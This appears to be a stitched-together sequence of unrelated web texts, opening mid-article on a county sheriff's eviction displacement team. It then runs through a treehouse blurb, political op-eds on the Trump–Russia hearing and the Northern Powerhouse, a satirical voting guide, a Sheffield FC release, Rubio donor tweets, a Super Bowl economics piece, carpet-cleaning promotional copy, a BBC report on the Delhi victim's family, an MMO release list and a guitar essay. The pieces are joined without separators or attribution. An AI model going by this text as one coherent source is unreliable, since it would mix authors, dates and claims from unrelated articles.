“By the time we get there, the case has been adjudicated,” Aviles says. “What we have is a five-day window between the time we post it and the time we evict.”
That leeway between notice and enforcement could alter the course of a person's life, he says. That's when the displacement team gets to work. By taking advantage of that narrow timeframe, Aviles hopes to prevent situations like so many he encountered in the past. He recalls an assignment in 2010 when he had to evict a mentally ill woman who was the sole caretaker of her brain-damaged daughter. Evicting them—a week before Thanksgiving, no less—would have rendered the women homeless.
“We told the landlord we just couldn't' do it,” he says, adding that his sergeant at the time helped him push back. “No way we're putting them on the street.”
Instead, he called the county's Office of the Public Guardian and Adult Protective Services, which informed him that it would take weeks to relocate the two women through that route. While scrambling for a way to avoid eviction, he did some detective work and tried to piece together their story. It took an hour of coaxing before the mother would admit that it was her name on the paperwork, let alone open up to Aviles. By prying her for information, he found out that the mother, who suffered from paranoia, apparently forgot to renew an authorization to receive her daughter's public assistance stipend. That, he presumes, is how she fell behind on rent.
“There were so many chances along the way to prevent this,” says Aviles, who went through crisis intervention training in 2010, which opened his eyes to the plight of the mentally ill. “Over the years, cases like that have been on the forefront of my mind. There should be a process that guarantees the best solution to these horrible situations.”
With Sheriff Smith's blessing, Aviles went around meeting with various nonprofits, social service agencies and county officials to create a network.
“It was months of me literally walking through the doors and saying, ‘So I have this idea,'” he says. “There was a lot of beating my feet on the pavement and pitching this to various people who passed the word onto various other people.”
In the course of laying the groundwork for the displacement mitigation team, Aviles enlisted social workers and attorneys. He got United Way to sign on, prompting the nonprofit to extend its 2-1-1 social services help line and algorithmic needs assessment to the effort. He put together a punch list with instructions for clerks and deputies to identify people who need the extra help.
“At the county, we really want to support that kind of effort,” says Steve Preminger, a special assistant to County Executive Jeff Smith. “We need to protect people's dignity, to make sure that they don't decay.”
Middleton compared the approach to the way police agencies respond to human trafficking cases, where social workers and advocates agree to ride along.
“We're simply extending that to the way we deal with evictions,” he says.
In a broader sense, the strategy reflects the changing nature of law enforcement. Decades of dismantling public psychiatric hospitals, supportive welfare programs and other institutions that once cared for people in need has turned the modern police officer into one of the few tax-funded agents of public wellness.
It's a reality that all too often plays into disaster. More than half the people who die at the hands of police had some kind of disability, according to a 2016 report by the Ruderman Family Foundation. The study's authors, historian David Perry and disability expert Lawrence Carter-Long, looked at incidents from 2013 to 2015. Their conclusion: that people with psychiatric disabilities are presumed dangerous in police interactions.
“Police have become the default responders to mental health calls,” the report found.
New York City police officer turned psychiatrist George Patterson says most modern policing involves services related to social work. In his view, latter-day cops are trained as soldiers but deployed as caretakers.
“The demand for services in general has grown and shifted,” Preminger agrees. “It speaks to income inequality, job training, population growth and budget cutbacks. These are the issues we're discussing at the county. We're talking more and more about how to adapt to this changing role—not just for police, but for all of us in all our departments.”
This past month, the displacement mitigation team got its first call from a tenant. Normally, they come from landlords or family. The tenant, who was being ousted by an out-of-town investment group, saw the five-day eviction notice taped to the door and called Aviles, unleashing an uninterrupted stream-of-consciousness diatribe.
“The overriding theme was that the sheriff has no authority to evict because various senators and FBI personnel have protected her from foreclosure,” Aviles recounts.
Though clean and well furnished, the woman's home was equipped with about two-dozen security cameras and at least three monitored alarm services. Sensing she needed extra support, Aviles asked the landlord for more time. Through traditional investigative methods, he tracked down her ex-husband, who passed his phone number to relatives in India. It took the mitigation team more complicated maneuvering through another ex-husband up in Seattle and a friend in Los Angeles, but the woman eventually reunited with her family abroad.
“She is now in India with her father and getting professional help,” Aviles reports. “I spent a lot of time trying to find somebody who knew about her. I talked to the neighbors, who really liked her and wanted to help. It's actually a testament to what a good soul she is. It shows how mental illness creates this shell that gets thicker, and thicker, and thicker as you deteriorate, but inside there's somebody that still loves.”
Of the 15,400 evictions processed in this county since 2006, only about 5 percent involve the kind of cases the mitigation team is designed to help. Aviles expects to deploy the above-and-beyond interventions about twice a week. Since launching the team this past fall, he says he's helped six people avoid homelessness or traumatic displacement.
“There's a whole universe of problems related to the housing crisis,” he says. “But here's a specific chance, a way to target our efforts to prevent homelessness before it starts. And to protect people who may not be able to fend for themselves.”
By connecting with various agencies, the displacement team could also reverse engineer the crises that brought people to the point of eviction.
“There are all these points along the way where someone or something may have helped them,” Preminger says. “Now that we're looking at it this way, we can start filling those gaps in service.”
Like this: Like Loading...
Related
Jennifer Wadsworth is the news editor for San Jose Inside and Metro Newspaper. Email tips to [email protected] or follow her on Twitter at @jennwadsworth.
Vajol Treehouse. A small treehouse built as a shelter and a playhouse for kids. It integrates itself with the tree completely, and there are a lot of brunches going through it without compromising the liveability of the internal space. The main shape of the tree, the position and alignment of the branches generated the shape of the treehouse, the sloping wall, the arrival balcony, and the shape of the roof. The stairs and two timber poles help the delicate kaki-tree (Asian Persimmon tree) to hold the treehouse. Located in the property of Rubinelli Wine Cellar, Valpolicella region, Italy, Europe.
The project was finished in one month by two workers from treetopbuilder team. It is made of 2.15 mc of timber. Also, more than 700 screws have been used in the making.
Source: treetopbuilder.net
Monday's hearing of the House Intelligence Committee was proof positive of the absolute need for both a special prosecutor and an independent, bipartisan commission with subpoena power to conduct a full investigation of the Trump campaign's connections with Russian intelligence — as well as Russia's multi-pronged attack on our elections and Trump's business connections with that country's oligarchs.
And it's proof now more than ever that even if we get that prosecutor and inquiry, a free and independent press may be the only real way to ever get to the bottom of what ranking committee member Adam Schiff said may represent “one of the most shocking betrayals of our democracy in history.”
Advertisement:
Just as FBI Director James Comey officially revealed for the very first time (finally!) that since late July the FBI has been investigating whether members of Trump's campaign colluded with Russia's interference with our elections and if Republicans, led by committee chair and Trump enabler Devin Nunes, did their best to blow smoke aimed at deflecting attention from what Trump and his team may or not have done. Instead, they asked question after question about the illegality of leaks of confidential material to the media — in particular, leaks about former Trump national security adviser Mike Flynn's contacts with Russia.
(Note that there was agreement that leaks are illegal but no one mentioned that it's the media's complete and constitutionally guaranteed right to report on them. Nor was anyone asked how many times GOP members of the committee have done their own leaking.)
Trump did what he could to distract as well, firing a volley of five heated early-morning tweets just before testimony began, reiterating claims that disgruntled Democrats manufactured charges about Russia's involvement in the election and contact with Trump aides. There were more during the hearing itself — from Trump or someone at the White House tweeting in his name — twisting the day's testimony by Comey and National Security Agency chief Mike Rogers. Bizarrely, the two men then were placed in the position of having to rebut Trump's allegations while they still were in the witness seats, correcting and putting the president in his place — virtually in real time.
Not only did Comey verify that the FBI was actively investigating Trump and his associates, he also flatly denied on behalf of his agency and the Justice Department that prior to January's inauguration now-former President Obama had ordered eavesdropping on Trump Tower. Under normal circumstances this would seem to neutralize yet another of Trump's wacky tweet storms, this one from two weeks ago, but as we've learned so well, the truth has never been a barrier to the social media madness of King Donald I.
And yet, as presidential historian Douglas Brinkley told The Washington Post, “There's a smell of treason in the air. Imagine if J. Edgar Hoover or any other FBI director would have testified against a sitting president? It would have been a mindboggling event.”
But here we are, adrift in a Cloud Cuckoo Land of prevarication and incompetence in which little seems capable of boggling or driving our minds agog these days and where the truth shall not set you free but subject you to ridicule from the rabid trolls of the right.
Advertisement:
And still there is hope. Even though neither Comey nor Rogers would reveal much of what they are discovering — continually citing the confidentiality they said was necessary to an ongoing investigation — the questions asked, despite the “no comment” answers, suggested ongoing areas of inquiry not only for investigating committees but also for the press.
For it is the free and independent media that continue to provide our clearest window into the extent of the investigation and the possible interface among the Trump campaign, Russia and the right. Late Monday, for example, McClatchy News reported:
“Federal investigators are examining whether far-right news sites played any role last year in a Russian cyber operation that dramatically widened the reach of news stories — some fictional — that favored Donald Trump's presidential bid, two people familiar with the inquiry say. “Operatives for Russia appear to have strategically timed the computer commands, known as ‘bots,' to blitz social media with links to the pro-Trump stories at times when the billionaire businessman was on the defensive in his race against Democrat Hillary Clinton, these sources said.”
McClatchy reports that most of the stories were linked from social media posts and many of them connected to stories at Breitbart and Alex Jones' InfoWars, as well as Russia Today and Sputnik News:
“Investigators examining the bot attacks are exploring whether the far-right news operations took any actions to assist Russia's operatives. Their participation, however, wasn't necessary for the bots to amplify their news through Twitter and Facebook.”
The spin machines are twirling at cyclonic speeds as the White House and the Republican Party counterattack or try to act as if none of this is happening. Like the refugee couple in "Casablanca", they pretend to hear very little and understand even less. At the end of Monday's testimony, intelligence committee chair Nunes actually told David Corn of Mother Jones that he had never heard of Roger Stone or Carter Page, two of the Trump/Russia story's most prominent and tawdry players. Ingenuous or ignorant? You be the judge.
Advertisement:
“Is it possible that all of these events and reports are completely unrelated and nothing more than an entirely unhappy coincidence?” Adam Schiff asked at Monday's hearing.
“Yes, it is possible. But it is also possible, maybe more than possible, that they are not coincidental, not disconnected and not unrelated, and that the Russians use the same techniques to corrupt US persons that they employed in Europe and elsewhere. We simply don't know. Not yet. And we owe it to the country to find out.”
During Schiff's questioning on Monday, Comey seemed to nod toward agreeing that Russia's hacking of the Democratic National Committee was not unlike the 1972 physical break-in at the DNC. You know, the one that precipitated the revelations, resignations and prison convictions of Watergate. Drip, drip, drip.
In light of this Christian Post article on the “Christian Voting Guide” put out by Rev. Steven Andrew, I was curious to see how Jesus himself would stack up against other candidates. The short answer is “not very well.” I've taken the liberty of revising Andrew's guide to reflect new information, but the criteria remain the same, based on his “Five Biblical Qualifications for Voting.” You can see the original table here.
Andrew says, “The Bible's qualifications for choosing leaders are a person who:”
Is a Christian who fears God; Calls for Christian religious liberty; Insists we have God-given rights; Is truthful; and Hates covetousness.
Let's see how the candidates shake out.
The Revised American Christian Voting Guide™
A higher score means the greater God will bless the USA. Liberty, better jobs and God's protection come from higher scores. Helping those with lower scores means more troubles from God's judgment for disobeying the Holy Bible, as well as unjust laws against God. This chart also reveals what percentage of a true American the person is.
Candidate Overall Rating Fears God Demands to Have Christian Religious Liberty Insists to Have God-given Rights Truthful Hates Covetousness 1) Mike Huckabee 93% (A) 92% 93% 95% 92% 91% 2) Rand Paul 85% (B) 80% 77% 91% 91% 91% 3) Ben Carson 82% (B-) 80% 77% 85% 85% 83% 4) Ted Cruz 80% (B-) 80% 83% 85% 72% 80% 5) Jesus of Nazareth 40% (F) Biblically unqualified – do not fear God. See references below. 0% 0% 0% 100% 100% Founding Fathers: John Hancock, George Washington, John Adams, John Jay… 100% (A+) 100% 100% 100% 100% 100%
Breaking down Jesus' scores:
Is a Christian who fears God;—Jesus isn't afraid of God at all; in fact, he consistently refers to him as “my Father.” Also? Not a Christian. On other measures that Andrew rates, such abortion, homosexuality, and transgender individuals, Jesus has consistently refused to take a position. He is pretty steadfastly opposed to divorce, on the other hand. Still, given some of his other problems, we have to give him a zero here. Calls for Christian religious liberty;—No: says “whoever wishes to be first among you must be slave of all.” Big zero here. Insists we have God-given rights;—Another zero, for the same reason as above, and for his clear instructions to “render unto Caesar.” It's true that Jesus also reserves those things that belong to God for God, but since Andrew disqualifies several candidates for accepting same-sex marriage as the law of the land, fair is fair. Jesus accepted the Roman laws, even when they were unjust, and subjected himself to them meekly. Not exactly a crusading culture warrior, then. Is truthful;—High marks here. Jesus never was a liar. “Let your word be “Yes, Yes” or “No, No”; anything more than this comes from the evil one.” Hates covetousness.—Again, Jesus does well by this measure, having a strong anti-covetousness platform. On the other hand, he does have an explicitly redistributionist economic program. No word on how Andrew would score that.
Averaging things out, 200/5 = 40, or a failing grade in most books. To be fair, Andrew does follow a somewhat different methodology than I do. Because Jesus says he would not take jot or a tittle away from Hebrew law, Andrew imputes some interpretations of that law to Jesus, as though he had spoken the passages himself. I've limited the evidence to direct quotes from the gospel texts. I think that's not an unreasonable distortion of the original evaluative process. Draw your own conclusions, but from the standards laid out by Andrew, I think the conclusion is obvious: Jesus is wrong on the issues, and wrong for America.
On the 24th October 1857, Sheffield FC was founded and the world's most popular sport was born. The club have long been recognised by world football for their impact on the game through the creation of the first rulebook, the first organised team, the first football derby and much more.
160 years on and #theworldsfirst is still pioneering, working to relocate the club to its original home with the project The Home of Football. The club is also leading the way with the lowest priced current season fan jersey in world football and uniting the oldest football clubs from each country under the banner of ‘The Club of Pioneers'. The club's foundation is developing grassroots football around the world, through social projects like ‘Boots for Roots', which includes shipping over 38,000 pairs of football boots to disadvantaged children worldwide.
Highlight activities will include a celebration dinner in Sheffield, an exhibition game on the 24th versus partners Classic Football shirts and the release of a limited edition heritage shirt based on the earliest known kit designs of the club.
Talking on the birthday, Sheffield FC Chairman Richard Tims stated: "160 years of the beautiful game is an historic landmark for football and a great opportunity for all involved to celebrate the roots of our beautiful game. We're looking forward to taking the story out to the world and also using the 160th as a platform to create never before seen content. We're inviting, fans, players, clubs, media & brands worldwide to join the celebrations, cherishing the roots and kick off of football".
Rubio Donors: Barring Positive Polls, Rubio Will Drop Out Prior to Florida Primary
According to Charlie Gasparino the Rubio donors have had about enough and are telling Marco Rubio to drop out before the Florida primary if his polls don't start changing.
Rubio trails Donald Trump by double digits in the Sunshine State.
Top @marcorubio donors say barring a positive poll, the Senator will suspend his campaign prior to the Fla primary.https://t.co/IRJSkevDD0 — Charles Gasparino (@CGasparino) March 9, 2016
More from Gasparino:
problem @marcorubio has is his donors are realists (unlike campaign staff) they see no path to victory right now it cld change but unlikely — Charles Gasparino (@CGasparino) March 9, 2016
But Rubio supporter Paul Singer wants him to tough it out until afer Florida.
Billionaire hedge fund manager and @marcorubio supporter Paul Singer prods candidate to tough it out until after Fla vote @FoxBusiness 140pm — Charles Gasparino (@CGasparino) March 9, 2016
. @MajorCBS reports @marcorubio campaign is engaged in deep conversations about future of his presidential campaign after Tues. shellacking — Mosheh Oinounou (@Mosheh) March 9, 2016
This story appears in ESPN The Magazine's Feb. 2 Music Issue. Subscribe today!
EVERY YEAR CITIES across the country battle for the chance to host the Super Bowl, pledging great sacrifices in exchange for a prize of dubious worth. This municipal dogfight reminds me of my favorite reality show, The Bachelor, which also features overeager contestants vying for the heart of a demanding suitor. Much like the women on The Bachelor, host cities adhere to an invisible script. The Super Bowl is an honor, they say, a fount of riches -- which is why I was surprised when Jerry Weiers, the mayor of Glendale, Arizona, recently told me he doesn't expect a windfall when his city hosts the big game in February. In fact, he says, "I totally believe we will lose money on this."
The NFL thrives on the perception that football is a powerful economic stimulus; anyone who questions that poses an existential threat. Unsurprisingly, Weiers' bluntness has not endeared him to the league. When the mayor said last year that Glendale lost more than $1 million when it hosted Super Bowl XLII in 2008, Arizona Cardinals president Michael Bidwill was furious. "Was it the most favorable thing I could have said? Not really," Weiers deadpans. In August, Bidwill called the stated losses "a bunch of malarkey," claiming that the Phoenix suburb had previously said it reaped $13 million in "media exposure" from the game.
Bidwill has accused Glendale's leaders of shortsightedness and incompetence; he has said that "the city hall people have done nothing" to support the game. The Cardinals' president was especially vexed when Glendale's hotels wouldn't guarantee a rate for Super Bowl visitors. "I'm not gonna demand that our hotels discount any more than I'm gonna demand that the NFL discount Super Bowl tickets," says Weiers.
The sight of a city official standing up to a league bigwig is so unusual, it's a little startling, like witnessing a dog walking on its hind legs. But Glendale is no ordinary city. It's a place that has given a great deal to sports, reaping little in return. Since 2000, Glendale has helped build three stadiums, including the Cardinals' field, a silvery dome that sits in the desert like a docked UFO. When the recession struck, tax revenues plummeted and plans to turn the dusty suburb into a retail oasis dissolved. Glendale now pays more than $40 million a year in interest on its stadiums and other expenses.
And the actual benefits of a Super Bowl bonanza are unclear. A study funded by Arizona's Super Bowl committee found that visitors spent $218 million around the 2008 game, but some economists say the actual profits were much lower because football fans crowded out other tourists. Little of that money aids the city directly. Glendale said it spent $3.4 million in 2008, mostly on public safety, and earned only $1.2 million in taxes from direct spending at places like hotels and restaurants. (Tickets are not taxed.) One former councilwoman, Joyce Clark, who voted against hosting the 2015 game after witnessing the city's losses seven years ago, scoffs at the idea that the publicity was worth it. "There has not been any corporation that moved to Glendale because the CEO came to the Super Bowl," she says.
The city expects to spend slightly less this time around, but it also anticipates lower sales, largely because the NFL has relocated its three-ring circus to Phoenix. The big parties have moved downtown; most of the fans and celebrities will stay there too. The same thing happened last year, when host city East Rutherford, New Jersey, was eclipsed by New York. East Rutherford's mayor, James Cassella, says the "arrogant" NFL was dismissive toward his town. "They pretty much said, 'You should be honored that the game is here,' " Cassella says.
Weiers says centralizing the revelry makes sense, but it also means Glendale needs help. After projecting losses of more than $3 million on the game, Weiers endorsed a bill last spring that would have enabled Glendale to be reimbursed by the state. It died in the Senate.
On The Bachelor, Prince Charming usually turns out to be a toad. For cities, this epiphany often comes too late. "This Super Bowl was promised before I became mayor," Weiers says. "There wasn't any backing out." In other words, the game must go on, even if Glendale loses again.
How to Choose the Best London Cleaning Company ServiceThere are numerous carpet cleaning companies available throughout London. Amongst the scores of carpet cleaners, it can be a tough task to choose the best service provider. Here are some tips to get you started.
Pricing factor
Price is definitely a crucial consideration, especially when it comes to a carpet cleaning service provider. However, price should not be the only guiding factor when it comes to choosing a provider. There is always a trade-off between price and service quality and both are usually inversely proportional to one another. Thus, whilst the price of a cleaning company maybe lesser, the service will be of poor quality and vice versa. Ideally, you should try to strike a balance to ensure optimal pricing and good service.
Money-back policies
Another aspect you should consider is that cleaning company should have a money-back policy. Such a policy guarantees that you get your money back in case there are flaws in the cleaning service or if you are not satisfied with the method of cleaning.
Demonstrations
One of the most critical aspects to base your decision on choosing a house cleaning is the demonstration. The prospective company needs to provide you with a free, no obligation demonstration. This demonstration will help you assess the service levels of the prospective company. Once you get the demonstration, you can compare the services amongst different companies to make an informed decision.
In order to separate genuine carpet cleaning from the fake ones, asking for a demonstration is crucial. Any reputed cleaners such as Carpet Cleaner will agree to provide a demonstration free. In this manner, you can decide which cleaning services are as per your standards and choose the perfect cleaning company you like.
Different Options to Use Whilst Cleaning Carpets
Cleaning your carpets need not be a time consuming task anymore. With the right tools and cleaning equipment, you too can become an expert at cleaning your own carpets. Here are some handy items, which are readily available and used to clean carpets.
Ammonia water mix
This is a time tested remedy to clean carpets. You need to mix in a teaspoon of ammonia along with half a cup of water. This solution can then be sprayed directly on the carpet area to be cleaned. If there are ketchup, mustard, pet, egg, blood or ink stains, this solution is a handy cleaning aid.
Dish detergent
You will need a quarter teaspoon of any good quality dish detergent and mix it with a quart amount of water. Use a tissue to blot out the existing carpet stain. Then, spray the detergent solution on the stains. Use a clean towel to blot and clean spots completely. Make sure you rotate the towel whilst trying to clean the area.
Vinegar
Vinegar has been a tried and tested house cleaning London agent for many purposes. In order to clean carpets with vinegar, you need to mix one portion of vinegar along with one portion of water. Use a spray can to saturate the stained area with this solution. Keep the solution on the stain for at least 15 minutes. Then, use a white clean towel to blot and remove the stain.
Lemon juice
Lemon juice has been a very popular cleaning agent for decades. Use neat lemon juice and fill into a spray can. Use it to clean carpets of lipstick, crayon, mud, egg, spaghetti sauce stains and others.
Professional cleaning
Whilst all the methods listed above tend to work well, they require time and energy. In contrast, hiring professional clenaers work well because they save time and hassle. Since these companies are specialised in handling carpet-cleaning jobs, you know your carpet will be cleaned thoroughly.
The Carpet Cleaning Locally is one of the premier information resources for finding your own local Carpet Cleaning Company in the UK.
Image caption Many in India are calling for death penalty for the attackers
The world knows her as the "Delhi gang-rape victim".
But her grief-stricken family and relatives, trying to come to terms with their loss, remember her as a brave girl who dreamed of relieving people's pain.
She wanted to build a hospital in her ancestral village in the northern Indian state of Uttar Pradesh.
She seldom visited the village, in one of the most undeveloped regions in the country, but she had said she wanted to do something to help the people there.
The family moved to Delhi in 1983 in search of a better life but on Monday, her family arrived to scatter her ashes in the river Ganges. I joined her parents and brothers in the village.
The last time I spoke to her was in the hospital on Christmas. She gestured with her fingers that she was going to heaven Victim's brother
Her father sat cross-legged on a stack of hay spread out thinly across the floor in a crudely-built hall outside the house.
"She was brave, had no fear, and was full of life," he said.
Born and raised in a lower middle class family, the 23-year old saw education as the passport to improving her family's economic plight.
She wanted to be a doctor since "she began playing with dolls", says the father.
Media playback is unsupported on your device Media caption Father: ''She whispered, mummy I am sorry... I am sorry''
"I told her repeatedly that I could not fund her education, but she did not budge."
But, she was determined and eventually she won. The family sold off a chunk of their village land to fund her education.
"I wanted my children to get the best of education," he says, proudly.
'Going to heaven'
Her brother, who was the last member from the family to speak to her before she was attacked, remembers her as an affectionate and hardworking elder sister who led by example while prodding her two brothers to study hard.
"She studied day and night. We would not even know when she slept and woke up."
Image caption Her ancestral village was in one of the most undeveloped regions of the country
He breaks down every time he remembers the fights he had with her, mostly over the television remote control - she preferred to watch soaps and Bigg Boss was one of her favourite programmes.
"She scolded me, but she loved me as well."
He recalls the events of the day when his sister was brutally attacked by six men in a bus.
"My sister normally returned home by 8pm every day. If she anticipated a delay, she would call up without fail and tell us how and when she would be back.
"On that day she rang up around 7pm and I took her call. She said that she would be slightly delayed but when I began calling her after 8pm, I couldn't get through to her."
A few hours' later, the family received a call from the Safdarjung hospital where she was taken by the police for treatment informing them that she had "met with an accident".
"She was not scared of anyone. We could never imagine that such a fate would befall her... She must never have imagined it."
Grim mood
He says the last time he spoke to her was in the hospital on Christmas.
Image caption The attack has triggered an outpouring of anger across India
"She gestured with her fingers that she was going to heaven."
Her father remembers how she asked for food once she regained consciousness in hospital. "She specifically asked for toffee. The doctor asked, 'will you mind a lollipop,' and she replied, 'yes!'"
He dismisses reports that she was about to get married soon: "She said she would not marry till her brothers finished their education."
The mood in her ancestral village is grim and the villagers are calling for the death penalty for the accused.
But her father is asking his two sons to look ahead.
"He told us to focus us on our forthcoming examination. But I can't - I have lost my power to feel and think," her brother said.
2015 is in the past, and the majority of 2016 lies ahead. What games will we be playing as we crawl through the calendar year? We're here to help figure that out. With this week's List, we'll take a quick look at all MMOs we expect to hit beta, early access, and launch in 2016. If the date simply says 2016, it's because we don't have a specific window. If it simply says “Beta”, it's because we haven't been told if 2016 is a target for launch as well. It's highly possible there's a game we missed too, so let us know in the comments!
Because of how unpredictable and unstable game development is, we wouldn't be surprised if a few of these games end up on 2017's list as well. But at the very least, whether from talking with the developers or folks behind the scenes, we expect to get be playing all of these games in some form during the year. We'll be updating the article as we hear back from developers, so keep an eye on it throughout the year!
advertisement advertisement
The list is in alphabetical order, so read on and share your thoughts!
EDITS:
Added Lineage Eternal, citing a 2016 Global Launch article.
Added Project Gorgon, as it's supposed to launch on Steam.
Removing Voxelnauts, as several sources say it has imploded.
Changed Chronicles of Elyria to Alpha and Q3
Added City of Titans alpha/beta.
Added Life of Rome alpha/beta.
Added Naval Action alpha/beta.
Added Albion Online (duh)
Added SkySaga
Albion Online / August-September 2016 / Launch
Albion Online developed by Sandbox Interactive is a buy to play medieval MMO. It's a classless cross platform MMORPG that allows for endless possibilities. Across 800 different territories guilds can engage in PvP for control of the world.
ARK: Survival Evolved / June 2016 / Launch
ARK: Survival Evolved, powered by Unreal Engine 4, takes on the survival genre with a unique blend of emergent multiplayer cooperation and competition. Players awake naked and starving on the beach of a mysterious island among a herd of other confused humans. On ARK, they must then hunt, harvest, craft, research technology, and build shelters to protect against scorching days, freezing nights, volatile weather systems, dangerous wildlife, and potential enemies.
ASTA: The War of Tears and Winds / Q1 2016 / Open Beta
ASTA – The War of Tears and Winds is a fantasy MMORPG inspired by Asian myths and legends, set in a vast and vibrant world filled with colorful environments and unique characters. The intuitive controls are ideal for both new and experienced players, allowing them to fully immerse themselves in the gameplay experience.
Black Desert / Q1 2016 / Launch
Black Desert Online is an up-and-coming MMO in development by Pearl Abyss. It is a sandbox MMORPG that features castle sieging, trading, crafting, player housing, parkour, and more. Players will enjoy jaw-dropping graphics, intuitive skill-based combat, and and immersive story encased in an expansive world just waiting to be explored. Accompanied by a Black Spirit, a companion whose destiny is intertwined with their own, players will discover the secret of the Black Stones and the history of their corrupting effects.
Blade & Soul / January 19th 2016 / Launch
Blade & Soul is a martial arts fantasy MMORPG by NCsoft and its Team Bloodlust division. The game will have stylized art and character designs by famed artist Hyung-tae Kim, and will feature lush environments and gameplay that borrows elements from fighting games, platformers, and even tosses in a few puzzles. With some of the most action-oriented combat in the genre, plus highly competitive PVP, it's bound to have more than a few fans.
Camelot Unchained / Q4 2016 / Launch (or Late Beta)
Camelot Unchained is an Arthurian fantasy MMORPG from City State Entertainment and Mark Jacobs, founder of Mythic Entertainment and known for his development of Dark Age of Camelot. Camelot Unchained offers the three factions of Arthurian, Tuatha De Danann, and Viking, and focuses on Realm-vs-Realm, housing, and a player economy, along with crafting and other features.
by Pete Prown
Does the guitar you have chosen help make you a better player? Is your technique, or even your songwriting, influenced by your gear?
We talk a lot about the bands, musicians or albums that have influenced us, but not so much about how the equipment inspires us. If you've been playing for a long time, you've probably had opportunities to try various instruments, amps, and outboard gear. Each one can potentially alter the way you conjure sounds and, in turn, how you approach music. Like painting with a wide brush instead of a narrow one, or programming drum sounds instead of pounding on skins, tools and technology can influence art.
Long Journey
Like you, I'm a guitarist and, looking back, there have been innumerable axes that have changed my fretboard sensibility. In 1980, I got an Ibanez Iceman IC200 — my first pro-grade guitar, replacing a simply dreadful Gibson Marauder. With its flat radius, ebony fingerboard and built-in neck, the Iceman allowed me to fly around the fretboard in homage to early heroes of mine like Michael Schenker, Carlos Santana, and Gary Moore. If fact, Ibanez's simple act of planing the fingerboard into a flatter profile made me a better lead player almost overnight. Conversely, it may have also kept me from developing my rhythm chops, as this beast was meant for shredding and power-chording only. A few years later, a custom Charvel Strat-style got me and a few thousand other guitarists into the whammy game, and I tweaked, flipped and jammed its locking Kahler trem into new areas of elastic expression (big nods to Steve Vai and Allan Holdsworth). It was the gear that partially pushed me to try new techniques.
In the '90s I landed a Telecaster Deluxe Nashville, which coincided with my discovery of surf rock and the twangin' electrics of the Hellecasters. Soon afterwards, my fast, shreddy licks got a little funkier and bluesier and, thanks to this “mexi” Fender plank, my lead playing finally started to grow up. The Tele also was ideal for R&B comping, and my rhythm playing finally began to take shape. In hindsight, it's the guitar that carved me into a decent rhythm guitarist.
The Whole Rig
It's not just guitars that can bring out new ideas and talents, of course. When I bought a Fender Hot Rod Deluxe combo, I was blown away at the fat tones I was able to produce from this mass-produced tube amp. Paired with the Telecaster, I began to morph from an '80s speedster into a '90s blues twanger. The amp's clean tones and unique overdrive also helped wean me off űber-saturated crunch and explore some more interesting clean and low-gain sounds. I've used good tube amps ever since (my latest is a terrific Mack 18-watt head — definitely worth a test drive).
In the years to follow I had greater epiphanies as I learned to record digital audio using Cakewalk's Sonar digital-recording sequencer, a simple, yet powerful program. More importantly, my vague musical ideas came to life as fleshed-out compositions in this digital universe. I could argue that no piece of technology has changed my approach to music more than this software has, and I bet many music makers would agree (whether they're using Sonar, Pro Tools, Logic, Cubase, or other DAW software).
Recording good-quality guitar sounds is easier now than ever before. An army of DI amp simulators, whether hardware (such as the ubiquitous Pod) or software (Amp Farm) now allow us record our guitar ideas with speed, spontaneity, and fairly impressive tone. Granted, we may revert to mics and tube amps when we want to nail down that keeper track, but for demos and recording on the fly, digital simulators rule.
Many guitarists have further broadened the palate of available tones through synthesis. In my case, a host of fast-tracking guitar synthesizers and pitch-to-MIDI pickups from Roland made my Proggy instrumentals soar like nothing else imaginable. From flutes to strings to brass to fat, Moog-like sounds, no conventional or acoustic guitar can lead you where a guitar synth can travel.
Pick of the Litter
Granted, I've been at this a while and by now am truly spoiled. The guitars in my project studio — from a 2001 Jeff Beck Stratocaster (my favorite guitar ever) to my latest purchase, a superlative Seagull Coastline S12 acoustic 12-string — all inspire my playing differently. Even among the more humble, mid-priced of my guitars, each seems to ask something unique of my playing. As a sidenote, it's a myth that great gear costs a lot of money. There are smoking Asian and Mexican guitars that cost only a few hundred bucks, as well as junkers with quilted-maple tops that cost several thousand.
A friend of mine who plays fingerstyle almost exclusively told me recently that he never would have explored the style if he hadn't lucked into a Taylor acoustic with a fast, comfortable neck. In the same breath he mentioned that he had just picked up his old PRS and felt about as competent on that solid-body as he would be on a tuba (he doesn't play tuba). Whether it was a matter of string tension, nut width, action, or just luthier mojo, each guitar evoked specific playing styles from him.
Boundary Busting
By picking up any guitar, we're agreeing to play within its margins. Sometimes the margins are narrow but focused, a “best tool for the job.” Sometimes they put us in a box, making it difficult for ideas to flow out as we hear them in our head. And sometimes a guitar's margins are so outside the bounds of what you've found available on other guitars, that the instrument helps expand your creativity.
So how about you and your guitars? Have they directed your musical journey onto certain paths — and is that where you intended to go?
Pete Prown records with Guitar Garden (www.guitargarden.net) and is a contributing editor for Vintage Guitar magazine (www.vguitar.com).
After years of hubristic budgets promising to make the neglected north the new Jerusalem, there came something of a change in tone this week: “I'll try to ensure #NorthernPowerhouse remains a priority,” tweeted former chancellor George Osborne, meekly, from the backbenches.
It sounds as if Osborne knows something we don't. If you weren't already worried that our rightwing cabinet has no real commitment to the redistribution of power and money to the north, then you should be now. You don't have to be a political genius to read between Osborne's lines: he fears the Berkshire-based prime minister and our Surrey-based chancellor have gone cold on his pet project.
To be fair to him, Osborne was at least a chancellor who talked up the north and recognised the unbalanced nature of our country. He also managed to devolve significant powers away from Westminster. But he wasn't around long enough to back up all the fine talk and the devolved powers with real money.
George Osborne (@George_Osborne) One Nation means all parts of country must feel part of our economic success. I'll try to ensure #NorthernPowerhouse remains a priority
As northern England waited patiently for the much-promised investment in modern rail lines to link our great cities, he used his last budget instead to throw another major bone in the direction of London – billions of pounds for Crossrail 2, even though Crossrail 1 hasn't even opened.
And let's not let him rewrite history: Osborne's period in office saw him inflict the biggest revenue cuts on the north. He used to talk about fixing the roof when the sun was shining. In Greater Manchester, he promised a powerhouse but it has a £1bn hole in it as his public service cuts continue to bite over the coming years.
George Osborne misses the point over his northern powerhouse Read more
But Osborne's northern powerhouse at least held out the promise of Tory jam tomorrow for the undernourished north. Now, with no obvious champion left in government, it looks set to go the same way as the big society: a memorable slogan leaving no discernible legacy. The emphasis on PR rather than end-product seems to sum up the Cameron-Osborne era.
A week into office, the new PM and chancellor have yet to give any public statement of support for the northern powerhouse. All of a sudden, it feels distinctly out of fashion. But if they are going cold on it, the new government will be making a monumental political mistake – and entirely the wrong response to the EU referendum. The truth is that, in post-Brexit Britain, the northern powerhouse should become much more, not less, important.
